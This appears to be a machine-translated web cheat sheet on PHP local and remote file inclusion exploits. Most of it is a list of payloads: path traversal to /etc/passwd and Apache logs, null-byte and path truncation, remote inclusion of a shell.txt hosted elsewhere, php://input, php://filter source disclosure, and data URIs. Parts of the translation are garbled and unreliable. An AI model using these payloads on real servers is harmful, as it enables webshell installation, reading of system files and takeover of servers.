-
php file contains exploit
First, the use of PHP configuration in file inclusion
File Containment Vulnerability is the vulnerability that occurs when a programmer introduces an externally submitted data into a process that contains a file, which is the most utilized vulnerability in the current web attack, and allows an attacker to easily gain access to the server (i.e. get Webshell). The file contains, in general, a local file containing the inclusion and remote file inclusion. Allow_url_fopen and Allow_url_include are decisions that contain conditions that belong to a local file containing (LFI) or remote file inclusion (RFI), and in PHP4 there is only one allow_url_fopen selection. Where Allow_url_fopen and Allow_url_include are 0n, a remote file contains a vulnerability, instead a local file contains a vulnerability. The two typical formats for file inclusion are as follows: 1. Files that need to be truncated contain an include ($_get[' SB ')); include ("$_get[' dir ']/test.php"); here to take advantage of file inclusion you have to break through the back/ Test.php, there are three ways to truncate the later data. (1) Use% 00来 truncation suitable for the occasion: Magic_quote for off in case of 2) use? Truncation: Remote file Inclusion (RFI), which is equivalent to constructing a GET request again. http://127.0.0.1:81/include.php?dir=http://127.0.0.1:81/shell.txt? (3) Truncation with a length limit of the path length is usually truncated to a length of 240,linux of 4096 use cases: all applicable because Windows and Linux filenames have a maximum path length (MAX_PATH) limit, Therefore, when the file name of the commit exceeds the maximum path length limit, the subsequent content is truncated to achieve the effect of include.php?dir=http://127.0.0.1:81/shell.txt///////////////////// 2. Directly contains the type include ("$_get[' dir ')"); You can specify the file name directly in Dir to implement the document inclusion without having to be truncated. In the case of register_globals, if the variable is not initialized, you canTo achieve the effect of file inclusion, usually sent on the Internet file contains the vulnerabilities are not the above two so direct, most need to register_globals to achieve file inclusion. Basic file contains vulnerability: Code: * contains files under the same path:? file=.htaccess* path traversal:? file=. /.. /.. /.. /.. /.. /.. /.. /.. /var/lib/locate.db (the file is very interesting because it allows you to search the file system) * Contains files injected with PHP code:? file=. /.. /.. /.. /.. /.. /.. /.. /.. /var/log/apache/error.log (You can find other possible Apache dirs here and other ways here. Think about all possible logfiles, file uploads, session files etc.) Restricted local file contains: code: * NULL character injection (null Byte injection):? file=. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd%00 (Requires magic_quotes_gpc=off) * Column directory (Null Byte injection):? file=.. /.. /.. /.. /.. /.. /.. /.. /.. /var/www/accounts/%00 (BSD only, need Magic_quotes_gpc=off, details here) * path truncation (path truncation):? file=. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd.\.\.\.\.\.\.\.\.\.\.\ ... (see here and here for more information) * Dot truncation:? file=. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd ....... ........ (Windows only, see here for more details) Basic remote file contains: code: * contains remote code (including):? file=[http|https|ftp]:// Websec.wordpress.com/shell.txt (Requires Allow_url_fopen=on and Allow_uRl_include=on) * Using PHP input stream (using PHP stream php://input):? file=php://input (Specify your payload in the POST parameters, wat Ch urlencoding, details here, requires allow_url_include=on) * Use PHP filter function (using PHP stream php://filter):? file=php:// Filter/convert.base64-encode/resource=index.php (lets you read PHP source because it wont get evaluated in base64. More details here and here) * Using data uris:?file=data://text/plain;base64,ssbsb3zlifbiuao= (requires Allow_url_ Include=on) * for cross-site scripting attacks (Using XSS):? File=http://127.0.0.1/path/xss.php?xss=phpcode (Makes sense if Firewalled or only whitelisted domains allowed) Restricted remote file contains vulnerability code: *? File=http://websec.wordpress.com/shell * file=http://websec.wordpress.com/shell.txt?* file=http://websec.wordpress.com/shell.txt%23 (Requires Allow_url_fopen =on and Allow_url_include=on) Static remote file contains vulnerability: code: * Man-in-the-middle attack (man in the middle) (lame indeed, but often forgotten)
PHP file contains exploit